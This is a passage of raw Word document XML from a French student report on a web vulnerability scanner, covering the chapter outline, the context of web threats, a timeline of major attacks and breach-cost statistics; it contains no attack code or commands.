        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Ce rapport s'articule autour de trois chapitres :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F962E99" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
        <w:ind w:left="283"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="003366"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">Chapitre 1 — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>présente l'état de l'art : contexte des cybermenaces, panorama des vulnérabilités OWASP, comparaison des outils existants et positionnement de notre solution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F8691E2" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
        <w:ind w:left="283"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="003366"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">Chapitre 2 — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>expose la conception complète : architecture en pipeline, diagrammes UML (cas d'utilisation, classes, séquence), description des modules et choix technologiques.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08973D9B" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
        <w:ind w:left="283"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="003366"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">Chapitre 3 — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>détaille la réalisation : environnement de test virtualisé (VMs), implémentation des modules en Python, interface CLI, suite de 42 tests, études de cas sur 8 vulnérabilités et analyse des 70 vulnérabilités détectées.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D23271F" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="38A09280" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="14" w:space="1" w:color="B40000"/>
        </w:pBdr>
        <w:spacing w:before="480"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="003366"/>
          <w:sz w:val="36"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Chapitre 1 – État de l'Art</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="032101DC"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1.1  Contexte et Enjeux de la Sécurité des Applications Web</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="245101BB" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>La sécurité des applications web est aujourd'hui au cœur des préoccupations des entreprises, des gouvernements et des organisations internationales. L'explosion du commerce électronique, des services cloud, des API REST et des architectures microservices a multiplié exponentiellement la surface d'attaque exposée sur Internet. Contrairement aux systèmes fermés, les applications web sont par nature accessibles à tous, rendant leur sécurisation particulièrement complexe.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52BC2E3D" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="200" w:after="80"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="505050"/>
          <w:sz w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>1.1.1  Évolution des Cybermenaces</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1846B9B2" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Les cyberattaques ciblant les applications web ont connu une évolution spectaculaire en termes de volume, de sophistication et d'impact. Les premières injections SQL documentées datent de 1998, mais le phénomène s'est massifié avec l'avènement du Web 2.0 et des applications dynamiques. Aujourd'hui, les attaquants combinent plusieurs techniques dans des chaînes d'exploitation complexes : un XSS permet de voler un cookie de session, qui donne accès à un back-office, depuis lequel une SSRF permet d'atteindre des services internes, et ainsi de suite.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C4EABD7" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Les ransomwares ciblant les applications web ont notamment connu une croissance de 95 % entre 2022 et 2023 selon CrowdStrike. Les attaques par injection représentent toujours le vecteur le plus utilisé, avec plus de 3,5 milliards de tentatives d'injection SQL bloquées chaque mois par les principaux WAF (Web Application Firewalls) mondiaux.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21235091" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="40"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:color w:val="505050"/>
          <w:sz w:val="18"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Tableau — Chronologie des cyberattaques majeures liées aux applications web</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1246"/>
        <w:gridCol w:w="3678"/>
        <w:gridCol w:w="4414"/>
      </w:tblGrid>
      <w:tr w:rsidR="006A6D93" w14:paraId="0E6FF831" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1247" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="003366"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="62D68F15" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Année</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3685" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="003366"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5C3C129C" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Événement majeur</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4422" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="003366"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="07A2DFCA" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A6D93" w:rsidRPr="007C23F1" w14:paraId="3CCD384D" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1247" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="78911EED" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>1998</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3685" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="725C73F7" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Premières injections SQL documentées</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4422" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5FD9ACF6" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:rPr>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t>Accès non autorisé à des bases de données</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A6D93" w14:paraId="0F4EA510" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1247" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="27F5C122" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>2003</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3685" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="19FF030E" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:rPr>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t>Création de l'OWASP Top 10 (v1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4422" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="6724F16C" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Standardisation des risques web</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A6D93" w14:paraId="7F66BB01" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1247" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="571F0EB5" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>2010</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3685" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5D8422EC" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Stuxnet — première cyberarme</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4422" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="313CAA87" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Sabotage d'infrastructures critiques</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A6D93" w:rsidRPr="007C23F1" w14:paraId="3BD289B9" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1247" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="23211DE2" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>2017</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3685" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="48843F24" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>WannaCry — 230 000 victimes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4422" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="14773254" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:rPr>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t>4 milliards USD de pertes mondiales</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A6D93" w14:paraId="74C42C12" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1247" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="16FA4372" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>2020</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3685" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="19FA1999" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>SolarWinds — supply chain attack</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4422" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2AB4CA5D" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>18 000 organisations compromises</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A6D93" w14:paraId="4DCE5889" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1247" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="24DBAA06" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>2021</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3685" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="1A1668D8" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Log4Shell (CVE-2021-44228)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4422" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="68C0F6F1" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Milliards de serveurs vulnérables</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A6D93" w14:paraId="7F06A535" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1247" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="00276993" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>2023</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3685" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0309CBCD" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>MOVEit Transfer — SQLi massive</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4422" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="29DC2F13" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>2 500+ organisations touchées</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3CFCE0D9" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="006A6D93"/>
    <w:p w14:paraId="4C4AA6FE" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="200" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="505050"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>1.1.2  Impact Économique et Réglementaire</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F54705" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Les violations de données liées aux applications web engendrent des coûts colossaux. Selon le rapport IBM Cost of a Data Breach 2023, le coût moyen d'une violation de données est de 4,45 millions de dollars, avec une augmentation de 15,3 % sur trois ans. Les secteurs les plus touchés sont la santé (10,9 M$), la finance (5,9 M$) et le secteur pharmaceutique (4,8 M$). Au-delà des pertes financières directes, les entreprises subissent des atteintes à leur réputation, des sanctions réglementaires (RGPD : jusqu'à 4 % du chiffre d'affaires mondial) et des perturbations opérationnelles.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9122"/>
      </w:tblGrid>
      <w:tr w:rsidR="006A6D93" w:rsidRPr="007C23F1" w14:paraId="050E267C" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9122" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="12" w:space="0" w:color="003366"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="003366"/>
              <w:bottom w:val="single" w:sz="12" w:space="0" w:color="003366"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="003366"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="EBF3FB"/>
          </w:tcPr>
          <w:p w14:paraId="6AB28878" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="80" w:after="80"/>
              <w:rPr>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="003366"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Chiffres clés de la cybersécurité web en 2023</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5E2A54E2" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:rPr>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t xml:space="preserve">   • 4,45 M$ : coût moyen d'une violation de données (IBM, 2023)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="19075485" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:rPr>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t xml:space="preserve">   • 74 % des violations impliquent une interaction humaine ou une faille applicative (Verizon DBIR)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="494233CE" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:rPr>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t xml:space="preserve">   • 43 % des vecteurs d'attaque initiaux passent par les applications web</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0BCA363D" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
            <w:pPr>
